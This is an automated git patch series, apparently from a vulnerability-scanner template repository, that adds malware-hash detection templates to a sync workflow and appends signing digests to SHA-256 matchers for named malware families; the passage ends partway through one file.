workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ae64f1627101761a228d30d41a83a0f9b1046d8a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 10:03:38 +0000 Subject: [PATCH 0502/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 65 ++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index a866fe189b..fe5436fde9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,7 +5,72 @@ on: - '.new-additions' - 'cloud/aws/sns/sns-public-subscribe-access.yaml' - 'dast/vulnerabilities/sqli/time-based-sqli.yaml' + - 'file/malware/hash/anthem-deeppanda-malware-hash.yaml' + - 'file/malware/hash/applejeus-malware-hash.yaml' + - 'file/malware/hash/avburner-malware-hash.yaml' + - 'file/malware/hash/backwash-malware-hash.yaml' + - 'file/malware/hash/blackenergy-driver-amdide-hash.yaml' + - 'file/malware/hash/blackenergy-driver-malware-hash.yaml' + - 'file/malware/hash/blackenergy-killdisk-malware-hash.yaml' + - 'file/malware/hash/blackenergy-ssh-malware-hash.yaml' + - 'file/malware/hash/blackenergy-vbs-malware-hash.yaml' + - 'file/malware/hash/bluelight-malware-hash.yaml' + - 'file/malware/hash/bluetermite-emdivi-malware-hash.yaml' + - 'file/malware/hash/bluetermite-emdivi-sfx-hash.yaml' + - 'file/malware/hash/charmingcypress-malware-hash.yaml' + - 'file/malware/hash/cheshirecat-malware-hash.yaml' + - 'file/malware/hash/cloudduke-malware-hash.yaml' + - 'file/malware/hash/codoso-gh0st-malware.yaml' + - 'file/malware/hash/codoso-malware-hash.yaml' + - 'file/malware/hash/codoso-pgv-malware-hash.yaml' + - 'file/malware/hash/codoso-plugx-malware-hash.yaml' + - 'file/malware/hash/disgomoji-malware-hash.yaml' + - 'file/malware/hash/dubnium-malware-hash.yaml' + - 'file/malware/hash/dubnium-sshopenssl-malware-hash.yaml' + - 'file/malware/hash/emissary-malware-hash.yaml' + - 'file/malware/hash/evilbamboo-malware-hash.yaml' + - 'file/malware/hash/fakem-malware-hash.yaml' + - 'file/malware/hash/flipflop-malware-hash.yaml' + - 'file/malware/hash/furtim-malware-hash.yaml' + - 'file/malware/hash/gimmick-malware-hash.yaml' + - 'file/malware/hash/godzilla-webshell-hash.yaml' + - 'file/malware/hash/greenbug-malware-hash.yaml' + - 'file/malware/hash/ico-malware-hash.yaml' + - 'file/malware/hash/industroyer-malware-hash.yaml' + - 'file/malware/hash/ironPanda-htran-malware-hash.yaml' + - 'file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml' + - 'file/malware/hash/ironpanda-malware-hash.yaml' + - 'file/malware/hash/locky-ransomware-hash.yaml' + - 'file/malware/hash/minidionis-readerview-malware-hash.yaml' + - 'file/malware/hash/minidionis-vbs-malware-hash.yaml' + - 'file/malware/hash/naikon-apt-malware-hash.yaml' + - 'file/malware/hash/neuron2-malware-hash.yaml' + - 'file/malware/hash/oilrig-malware-hash.yaml' + - 'file/malware/hash/passcv-ntscan-malware-hash.yaml' + - 'file/malware/hash/passcv-sabre-malware-hash.yaml' + - 'file/malware/hash/passcv-signingcert-malware-hash.yaml' + - 'file/malware/hash/petya-ransomware-hash.yaml' + - 'file/malware/hash/poseidongroup-maldoc-malware-hash.yaml' + - 'file/malware/hash/poseidongroup-malware-hash.yaml' + - 'file/malware/hash/powerstar-malware-hash.yaml' + - 'file/malware/hash/purplewave-malware-hash.yaml' + - 'file/malware/hash/red-leaves-malware-hash.yaml' + - 'file/malware/hash/regeorg-webshell-hash.yaml' + - 'file/malware/hash/revil-ransomware-hash.yaml' + - 'file/malware/hash/rokrat-malware-hash.yaml' + - 'file/malware/hash/sauron-malware-hash.yaml' + - 'file/malware/hash/seaduke-malware-hash.yaml' + - 'file/malware/hash/sfx1-malware-hash.yaml' + - 'file/malware/hash/sfxrar-acrotray-malware-hash.yaml' + - 'file/malware/hash/sharpext-malware-hash.yaml' + - 'file/malware/hash/sofacy-Winexe-malware-hash.yaml' + - 'file/malware/hash/sofacy-bundestag-malware-hash.yaml' + - 'file/malware/hash/sofacy-fybis-malware-hash.yaml' + - 'file/malware/hash/tidepool-malware-hash.yaml' + - 'file/malware/hash/turla-malware-hash.yaml' + - 'file/malware/hash/unit78020-malware-hash.yaml' - 'file/malware/hash/upstyle-malware-hash.yaml' + - 'file/malware/hash/wildneutron-malware-hash.yaml' - 'http/cves/2021/CVE-2021-38146.yaml' - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2021/CVE-2021-43831.yaml' From 56b7008557789d1a2e2cc56e7c6610d1d9ddb10c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 10:04:41 +0000 Subject: [PATCH 0503/1841] Auto Template Signing [Fri Jun 21 10:04:41 UTC 2024] :robot: --- file/malware/hash/anthem-deeppanda-malware-hash.yaml | 1 + file/malware/hash/applejeus-malware-hash.yaml | 3 ++- file/malware/hash/avburner-malware-hash.yaml | 3 ++- file/malware/hash/backwash-malware-hash.yaml | 3 ++- file/malware/hash/blackenergy-driver-amdide-hash.yaml | 1 + file/malware/hash/blackenergy-driver-malware-hash.yaml | 1 + file/malware/hash/blackenergy-killdisk-malware-hash.yaml | 3 ++- file/malware/hash/blackenergy-ssh-malware-hash.yaml | 3 ++- file/malware/hash/blackenergy-vbs-malware-hash.yaml | 1 + file/malware/hash/bluelight-malware-hash.yaml | 3 ++- file/malware/hash/bluetermite-emdivi-malware-hash.yaml | 3 ++- file/malware/hash/bluetermite-emdivi-sfx-hash.yaml | 1 + file/malware/hash/charmingcypress-malware-hash.yaml | 3 ++- file/malware/hash/cheshirecat-malware-hash.yaml | 1 + file/malware/hash/cloudduke-malware-hash.yaml | 3 ++- file/malware/hash/codoso-gh0st-malware.yaml | 1 + file/malware/hash/codoso-malware-hash.yaml | 1 + file/malware/hash/codoso-pgv-malware-hash.yaml | 3 ++- file/malware/hash/codoso-plugx-malware-hash.yaml | 1 + file/malware/hash/disgomoji-malware-hash.yaml | 3 ++- file/malware/hash/dubnium-malware-hash.yaml | 1 + file/malware/hash/dubnium-sshopenssl-malware-hash.yaml | 1 + file/malware/hash/emissary-malware-hash.yaml | 3 ++- file/malware/hash/evilbamboo-malware-hash.yaml | 1 + file/malware/hash/fakem-malware-hash.yaml | 1 + file/malware/hash/flipflop-malware-hash.yaml | 3 ++- file/malware/hash/furtim-malware-hash.yaml | 1 + file/malware/hash/gimmick-malware-hash.yaml | 3 ++- file/malware/hash/godzilla-webshell-hash.yaml | 3 ++- file/malware/hash/greenbug-malware-hash.yaml | 3 ++- file/malware/hash/ico-malware-hash.yaml | 1 + file/malware/hash/industroyer-malware-hash.yaml | 1 + file/malware/hash/ironPanda-htran-malware-hash.yaml | 3 ++- file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml | 3 ++- file/malware/hash/ironpanda-malware-hash.yaml | 1 + file/malware/hash/locky-ransomware-hash.yaml | 3 ++- file/malware/hash/minidionis-readerview-malware-hash.yaml | 1 + file/malware/hash/minidionis-vbs-malware-hash.yaml | 1 + file/malware/hash/naikon-apt-malware-hash.yaml | 1 + file/malware/hash/neuron2-malware-hash.yaml | 1 + file/malware/hash/oilrig-malware-hash.yaml | 1 + file/malware/hash/passcv-ntscan-malware-hash.yaml | 3 ++- file/malware/hash/passcv-sabre-malware-hash.yaml | 1 + file/malware/hash/passcv-signingcert-malware-hash.yaml | 3 ++- file/malware/hash/petya-ransomware-hash.yaml | 1 + file/malware/hash/poseidongroup-maldoc-malware-hash.yaml | 1 + file/malware/hash/poseidongroup-malware-hash.yaml | 1 + file/malware/hash/powerstar-malware-hash.yaml | 3 ++- file/malware/hash/purplewave-malware-hash.yaml | 1 + file/malware/hash/red-leaves-malware-hash.yaml | 3 ++- file/malware/hash/regeorg-webshell-hash.yaml | 1 + file/malware/hash/revil-ransomware-hash.yaml | 1 + file/malware/hash/rokrat-malware-hash.yaml | 3 ++- file/malware/hash/sauron-malware-hash.yaml | 1 + file/malware/hash/seaduke-malware-hash.yaml | 3 ++- file/malware/hash/sfx1-malware-hash.yaml | 1 + file/malware/hash/sfxrar-acrotray-malware-hash.yaml | 3 ++- file/malware/hash/sharpext-malware-hash.yaml | 3 ++- file/malware/hash/sofacy-Winexe-malware-hash.yaml | 1 + file/malware/hash/sofacy-bundestag-malware-hash.yaml | 1 + file/malware/hash/sofacy-fybis-malware-hash.yaml | 1 + file/malware/hash/tidepool-malware-hash.yaml | 1 + file/malware/hash/turla-malware-hash.yaml | 3 ++- file/malware/hash/unit78020-malware-hash.yaml | 1 + file/malware/hash/wildneutron-malware-hash.yaml | 3 ++- 65 files changed, 94 insertions(+), 29 deletions(-) diff --git a/file/malware/hash/anthem-deeppanda-malware-hash.yaml b/file/malware/hash/anthem-deeppanda-malware-hash.yaml index 8c9bf630b8..00029ba0df 100644 --- a/file/malware/hash/anthem-deeppanda-malware-hash.yaml +++ b/file/malware/hash/anthem-deeppanda-malware-hash.yaml @@ -19,3 +19,4 @@ file: - "sha256(raw) == 'ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2'" - "sha256(raw) == 'c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f'" condition: or +# digest: 490a00463044022009a7d212c5c5ec1ebca673e0f26314538a297fddc99b92d53587f28b2eeac3c802207abb951c36428ed3421a5d685870e46a576276a5b8cdb293b40abf767ced8589:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/applejeus-malware-hash.yaml b/file/malware/hash/applejeus-malware-hash.yaml index 264e79f7ca..5564b01763 100644 --- a/file/malware/hash/applejeus-malware-hash.yaml +++ b/file/malware/hash/applejeus-malware-hash.yaml @@ -20,4 +20,5 @@ file: - "sha256(raw) == 'a0db8f8f13a27df1eacbc01505f311f6b14cf9b84fbc7e84cb764a13f001dbbb'" - "sha256(raw) == 'a241b6611afba8bb1de69044115483adb74f66ab4a80f7423e13c652422cb379'" - "sha256(raw) == '17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b'" - condition: or \ No newline at end of file + condition: or +# digest: 4b0a00483046022100b9ffe0405c3e1b2f5a78f7d35de9fcebe05f08f84e56688356b9784e8d8eebc7022100b90a82c2f36e07835c7e7d7e198ce96fb361be2e9eed76e3cae80063fcc89a9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/avburner-malware-hash.yaml b/file/malware/hash/avburner-malware-hash.yaml index eb752d4cc3..e4fa0bc88a 100644 --- a/file/malware/hash/avburner-malware-hash.yaml +++ b/file/malware/hash/avburner-malware-hash.yaml @@ -15,4 +15,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == '4b1b1a1293ccd2c0fd51075de9376ebb55ab64972da785153fcb0a4eb523a5eb'" \ No newline at end of file + - "sha256(raw) == '4b1b1a1293ccd2c0fd51075de9376ebb55ab64972da785153fcb0a4eb523a5eb'" +# digest: 4a0a00473045022100f8477adf4215907bc55dbf7776c940c9881f598394af92e08e20ee0fe90c223a022068b7ba7a4620b470215521a7504c1d8c9b10ea010a003de19217c37f3a23f7f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/backwash-malware-hash.yaml b/file/malware/hash/backwash-malware-hash.yaml index 9e998264cf..16ac0d800d 100644 --- a/file/malware/hash/backwash-malware-hash.yaml +++ b/file/malware/hash/backwash-malware-hash.yaml @@ -25,4 +25,5 @@ file: - "sha256(raw) == '72f7d4d3b9d2e406fa781176bd93e8deee0fb1598b67587e1928455b66b73911'" - "sha256(raw) == '4d913ecb91bf32fd828d2153342f5462ae6b84c1a5f256107efc88747f7ba16c'" - "sha256(raw) == '98e39573a3d355d7fdf3439d9418fdbf4e42c2e03051b5313d5c84f3df485627'" - condition: or \ No newline at end of file + condition: or +# digest: 4b0a00483046022100ae727b6d00154914ae43b7d0570a5e4abee33341a6b5786be48fe2bb027d8408022100d0ef741360e46aded1e0d7609864fb6d12c154d343233251799bc896550476e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/blackenergy-driver-amdide-hash.yaml b/file/malware/hash/blackenergy-driver-amdide-hash.yaml index dc80570888..a2be5b70fe 100644 --- a/file/malware/hash/blackenergy-driver-amdide-hash.yaml +++ b/file/malware/hash/blackenergy-driver-amdide-hash.yaml @@ -24,3 +24,4 @@ file: - "sha256(raw) == 'cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988'" - "sha256(raw) == '1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68'" condition: or +# digest: 4b0a0048304602210092a22727336f846116818542136787558ac60bac32434cb43e885f8219611b1e022100efe63d7b61f6b6ead92326259bce806df50567cb9862d210c84b4bbadae50bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/blackenergy-driver-malware-hash.yaml b/file/malware/hash/blackenergy-driver-malware-hash.yaml index 716ed3a42c..a6b629aef4 100644 --- a/file/malware/hash/blackenergy-driver-malware-hash.yaml +++ b/file/malware/hash/blackenergy-driver-malware-hash.yaml @@ -24,3 +24,4 @@ file: - "sha256(raw) == '244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5'" - "sha256(raw) == 'edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf'" condition: or +# digest: 4a0a004730450220182af1b18ad6459798f42c01ed4e25e60016e88d3ce86dd0346dd7e268c13f3a022100d62cbcdbb932d6f7d196c33119c356b0cbd4a98e2d69c823c981d83ee5043af7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/blackenergy-killdisk-malware-hash.yaml b/file/malware/hash/blackenergy-killdisk-malware-hash.yaml index 65d90a1035..1723135d5a 100644 --- a/file/malware/hash/blackenergy-killdisk-malware-hash.yaml +++ b/file/malware/hash/blackenergy-killdisk-malware-hash.yaml @@ -19,4 +19,5 @@ file: - "sha256(raw) == '5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6'" - "sha256(raw) == 'c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d'" - "sha256(raw) == 'f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95'" - condition: or \ No newline at end of file + condition: or +# digest: 4a0a0047304502202458980ebea305eb929ecde0f231be11033f344aa6579fd33fe4002bdb7dad5b022100dbbbe9b8f9f64dbaa08349d818b345c64550f8cfb123d517764b5cc29cfc0ff3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/blackenergy-ssh-malware-hash.yaml b/file/malware/hash/blackenergy-ssh-malware-hash.yaml index 3e0f76619f..c05a113b85 100644 --- a/file/malware/hash/blackenergy-ssh-malware-hash.yaml +++ b/file/malware/hash/blackenergy-ssh-malware-hash.yaml @@ -15,4 +15,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == '0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd'" \ No newline at end of file + - "sha256(raw) == '0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd'" +# digest: 4b0a00483046022100881e31ce7ee7044a7376e7fdb54e451a8811f86ceba285ac316ae5a027d2cef7022100845173c43c2e7eb75d5d35f0639dd292f3f03faae0d199677a387a6149e8cb15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/blackenergy-vbs-malware-hash.yaml b/file/malware/hash/blackenergy-vbs-malware-hash.yaml index 56f011ddb6..0c273b844e 100644 --- a/file/malware/hash/blackenergy-vbs-malware-hash.yaml +++ b/file/malware/hash/blackenergy-vbs-malware-hash.yaml @@ -18,3 +18,4 @@ file: - "sha256(raw) == 'b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f'" - "sha256(raw) == '0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd'" condition: or +# digest: 4b0a00483046022100dd35c8697b29b51ba6b14fcbe3a51a5ba8e9a1d6861a04871287a6985d575348022100e8881b7e0f6d91af1c12d0deb56e666fec5b4f0e8930010a1886d38fe5d23672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/bluelight-malware-hash.yaml b/file/malware/hash/bluelight-malware-hash.yaml index 2dca1ca113..f3a020b714 100644 --- a/file/malware/hash/bluelight-malware-hash.yaml +++ b/file/malware/hash/bluelight-malware-hash.yaml @@ -18,4 +18,5 @@ file: - "sha256(raw) == '837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed'" - "sha256(raw) == '7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d'" - "sha256(raw) == '94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a'" - condition: or \ No newline at end of file + condition: or +# digest: 4b0a00483046022100bee4e8268cf26453045145f505f3aa37568f85c67d982701b3d3c06b750a3dc4022100adbefd57c061ddfe5ab00a929baa9e8eecf250eac26791bf3d0e80bf58544170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/bluetermite-emdivi-malware-hash.yaml b/file/malware/hash/bluetermite-emdivi-malware-hash.yaml index 3b2faa0675..46ee0790d5 100644 --- a/file/malware/hash/bluetermite-emdivi-malware-hash.yaml +++ b/file/malware/hash/bluetermite-emdivi-malware-hash.yaml @@ -30,4 +30,5 @@ file: - "sha256(raw) == '6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662'" - "sha256(raw) == '90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86'" - "sha256(raw) == 'a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d'" - condition: or \ No newline at end of file + condition: or +# digest: 4a0a00473045022100d921976429b755e2f6cc4781a3a9f484091fff45426fef48c161dec9fc213002022035ea8dcd09bf5fe2f185ef8eb60c9ac6c60c1f93be5df28e294140c3f6f196d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml b/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml index 3f28f778d6..e728ecaaa1 100644 --- a/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml +++ b/file/malware/hash/bluetermite-emdivi-sfx-hash.yaml @@ -18,3 +18,4 @@ file: - "sha256(raw) == '7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196'" - "sha256(raw) == '8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b'" condition: or +# digest: 4a0a004730450220237b93f547cec24240197d2e95af29b2221cdf84a36f5e6fb0576338ec036f98022100eb38116bfab516f16cdf0309ed52e6368c8072fbc240fc2b2ecd13b98997ed19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/charmingcypress-malware-hash.yaml b/file/malware/hash/charmingcypress-malware-hash.yaml index 954f146f87..b375270404 100644 --- a/file/malware/hash/charmingcypress-malware-hash.yaml +++ b/file/malware/hash/charmingcypress-malware-hash.yaml @@ -14,4 +14,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == 'fdc5d6caaaa4fb14e62bd42544e8bb8e9b02220e687d5936a6838a7115334c51'" \ No newline at end of file + - "sha256(raw) == 'fdc5d6caaaa4fb14e62bd42544e8bb8e9b02220e687d5936a6838a7115334c51'" +# digest: 4b0a00483046022100d257198acc6cd79984bca30b43f87a0ab0379697637cdee94ba2baa75aca0d0b0221008348f7b8530f89d108d894f02326494d4ce63931469c49708cbdca332be5f61d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/cheshirecat-malware-hash.yaml b/file/malware/hash/cheshirecat-malware-hash.yaml index 8d519923bf..0822c63d6d 100644 --- a/file/malware/hash/cheshirecat-malware-hash.yaml +++ b/file/malware/hash/cheshirecat-malware-hash.yaml @@ -20,3 +20,4 @@ file: - "sha256(raw) == '63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb'" - "sha256(raw) == 'c074aeef97ce81e8c68b7376b124546cabf40e2cd3aff1719d9daa6c3f780532'" condition: or +# digest: 4a0a00473045022021e6a5ce1cbde7c589e8040bcf4c9ff635eae36b4030c206440580863737eed2022100b3db91ac75df21e9c8e77385d86e2d0c9099b698cb44cd9f0ee9c85aced3b886:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/cloudduke-malware-hash.yaml b/file/malware/hash/cloudduke-malware-hash.yaml index 63cd486b98..6a6663345d 100644 --- a/file/malware/hash/cloudduke-malware-hash.yaml +++ b/file/malware/hash/cloudduke-malware-hash.yaml @@ -30,4 +30,5 @@ file: - "sha256(raw) == 'ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145'" - "sha256(raw) == 'a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004'" - "sha256(raw) == '56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e'" - condition: or \ No newline at end of file + condition: or +# digest: 490a0046304402202a89b12c811db5885bcfc2b2d2e4ddeef1a3d4a6735b7e737e1fd34a2975c12b0220157129a18a197afbb9e1d6e91cdd45657c79f22ed4fd9881ffae2aa061b96175:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/codoso-gh0st-malware.yaml b/file/malware/hash/codoso-gh0st-malware.yaml index 161737bc43..e927d20cde 100644 --- a/file/malware/hash/codoso-gh0st-malware.yaml +++ b/file/malware/hash/codoso-gh0st-malware.yaml @@ -20,3 +20,4 @@ file: - "sha256(raw) == '7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8'" - "sha256(raw) == 'd7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297'" condition: or +# digest: 4a0a0047304502202ebd3119c13096fad713b242106abe1626d905bf5c030524c6af82dd1b9ae603022100d7635a3dd4876a4e5bb59d956e7d0b2a57b565afbc92279e54767a3cc947a57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/codoso-malware-hash.yaml b/file/malware/hash/codoso-malware-hash.yaml index c3def1f955..6796baf71e 100644 --- a/file/malware/hash/codoso-malware-hash.yaml +++ b/file/malware/hash/codoso-malware-hash.yaml @@ -24,3 +24,4 @@ file: - "sha256(raw) == 'd66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090'" - "sha256(raw) == '3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3'" condition: or +# digest: 4a0a004730450220308710bed21d5eb52e56a7561d04353c42bffe6291b6b826b50da6777de368310221009e0df4a7212395c0c75578001769a2240a27bab1c047e00858df537c057988cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/codoso-pgv-malware-hash.yaml b/file/malware/hash/codoso-pgv-malware-hash.yaml index f94d77ca43..83aeb09ad9 100644 --- a/file/malware/hash/codoso-pgv-malware-hash.yaml +++ b/file/malware/hash/codoso-pgv-malware-hash.yaml @@ -21,4 +21,5 @@ file: - "sha256(raw) == '13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75'" - "sha256(raw) == 'bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe'" - "sha256(raw) == '4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f'" - condition: or \ No newline at end of file + condition: or +# digest: 4a0a00473045022100880ccf3fafac7e58b750b727c22e2d7284b5c2de263a5f5157a2abce9d951e2b02205f7f4fda15882dc695ba9258038ab6b6a2d72a07b2fe7e2f6dc7a5e9dbab223d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/codoso-plugx-malware-hash.yaml b/file/malware/hash/codoso-plugx-malware-hash.yaml index 4eb060ec8b..0a3e89cd0c 100644 --- a/file/malware/hash/codoso-plugx-malware-hash.yaml +++ b/file/malware/hash/codoso-plugx-malware-hash.yaml @@ -22,3 +22,4 @@ file: - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" - "sha256(raw) == '74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3'" condition: or +# digest: 4b0a00483046022100a28fe5e6a592e203aac91b31c5a900928317b3742110677293d6908b550c78dc022100f11027e271942369229d95f7aa2cbd9abcf5b4bfc0ef887e4e0af9dde1146fcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/disgomoji-malware-hash.yaml b/file/malware/hash/disgomoji-malware-hash.yaml index 13236031c7..b4be83a827 100644 --- a/file/malware/hash/disgomoji-malware-hash.yaml +++ b/file/malware/hash/disgomoji-malware-hash.yaml @@ -15,4 +15,5 @@ file: matchers: - type: dsl dsl: - - "sha256(raw) == '2abaae4f6794131108adf5b42e09ee5ce24769431a0e154feabe6052cfe70bf3'" \ No newline at end of file + - "sha256(raw) == '2abaae4f6794131108adf5b42e09ee5ce24769431a0e154feabe6052cfe70bf3'" +# digest: 4b0a00483046022100f4dd415de9758c33403ccdc3b73573fa19b2af5574765856c455437f5fe08b900221009cadd9822eb7d450cbea102040895e61f38ecdb8088f8bcc60f7e70c866dc0f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/dubnium-malware-hash.yaml b/file/malware/hash/dubnium-malware-hash.yaml index 716cea49e8..905071f1d1 100644 --- a/file/malware/hash/dubnium-malware-hash.yaml +++ b/file/malware/hash/dubnium-malware-hash.yaml @@ -42,3 +42,4 @@ file: - "sha256(raw) == 'bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f'" - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" condition: or +# digest: 4b0a00483046022100fb949228730cf2df5b5a602f356052bd8ddaa764296876d3c14dcba0a985e3d702210080dfe0d200211647959d074d337ae352a0cb5af16e8aa10592364b7877d06368:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml b/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml index 879d378ea6..04fa37b803 100644 --- a/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml +++ b/file/malware/hash/dubnium-sshopenssl-malware-hash.yaml @@ -24,3 +24,4 @@ file: - "sha256(raw) == 'a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9'" - "sha256(raw) == 'e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b'" condition: or +# digest: 4a0a00473045022100814d6f96b726faace0737c580ac77347eec68358162a181b3f81a66845d56c7702207398cf01015d51ffc9c50f378aaf216f2f89694e1c847279dcba476322d43755:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/emissary-malware-hash.yaml b/file/malware/hash/emissary-malware-hash.yaml index 96d7fbea35..0ce7d1d152 100644 --- a/file/malware/hash/emissary-malware-hash.yaml +++ b/file/malware/hash/emissary-malware-hash.yaml @@ -30,4 +30,5 @@ file: - "sha256(raw) == '29d8dc863427c8e37b75eb738069c2172e79607acc7b65de6f8086ba36abf051'" - "sha256(raw) == '98fb1d2975babc18624e3922406545458642e01360746870deee397df93f50e0'" - "sha256(raw) == 'fbcb401cf06326ab4bb53fb9f01f1ca647f16f926811ea66984f1a1b8cf2f7bb'" - condition: or \ No newline at end of file + condition: or +# digest: 4b0a00483046022100c7db698f9fba6a6bcc96bd22a4e5c7ab462ce12f6486e676e96eae11860095ff022100beddf7aca317e4932871573e5320d018a47e64df0d0e2f9d778ca7bd69369cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/evilbamboo-malware-hash.yaml b/file/malware/hash/evilbamboo-malware-hash.yaml index 705f65971c..82ef4be5ae 100644 --- a/file/malware/hash/evilbamboo-malware-hash.yaml +++ b/file/malware/hash/evilbamboo-malware-hash.yaml @@ -34,3 +34,4 @@ file: - "sha256(raw) == '7995c382263f8dbbfc37a9d62392aef8b4f89357d436b3dd94dea842f9574ecf'" - "sha256(raw) == 'efea95720853e0cd2d9d4e93a64a726cfe17efea7b17af7c4ae6d3a6acae5b30'" condition: or +# digest: 4a0a0047304502206d8e6848dc4301823b8e130856dbe24d08992b76845f62f3714c1616a1132640022100b6f74f98ddbd5421cb7228f6f2a457ce927e5d388f36b2296286d137d7eb74ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/fakem-malware-hash.yaml b/file/malware/hash/fakem-malware-hash.yaml index 2935d5bbe1..65a848cb77 100644 --- a/file/malware/hash/fakem-malware-hash.yaml +++ b/file/malware/hash/fakem-malware-hash.yaml @@ -29,3 +29,4 @@ file: - "sha256(raw) == '53cecc0d0f6924eacd23c49d0d95a6381834360fbbe2356778feb8dd396d723e'" - "sha256(raw) == '523ad50b498bfb5ab688d9b1958c8058f905b634befc65e96f9f947e40893e5b'" condition: or +# digest: 